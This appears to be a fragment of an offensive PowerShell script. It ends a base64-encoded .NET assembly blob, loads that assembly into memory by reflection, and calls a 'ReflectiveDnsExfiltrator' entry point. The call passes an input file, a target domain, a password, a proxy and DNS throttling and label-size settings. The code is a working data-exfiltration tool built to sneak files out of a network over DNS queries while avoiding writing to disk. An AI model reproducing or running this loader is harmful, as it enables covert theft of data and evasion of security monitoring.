AAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAADAAAAOA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==")
[System.Reflection.Assembly]::Load($DNSExfiltratorLib) | Out-Null
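# Build the argument list for Main: the four mandatory values in positional order
# (input file, domain name, password, proxy server), then each optional setting that was supplied as a t=/r=/l= pair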
$Args = [System.Collections.ArrayList]@()
$Args.Add($InputFile) | Out-Null
$Args.Add($DomainName) | Out-Null
$Args.Add($Password) | Out-Null
$Args.Add($ProxyServer) | Out-Null
if ($ThrottleTime) {
$Args.Add("t=$ThrottleTime") | Out-Null
}
if ($RequestMaxSize) {
$Args.Add("r=$RequestMaxSize") | Out-Null
}
if ($LabelMaxSize) {
$Args.Add("l=$LabelMaxSize") | Out-Null
}
# Call the loaded assembly's static Main method directly, in the current PowerShell process
[ReflectiveDnsExfiltrator.ReflectiveDnsExfiltrator]::Main($Args)
}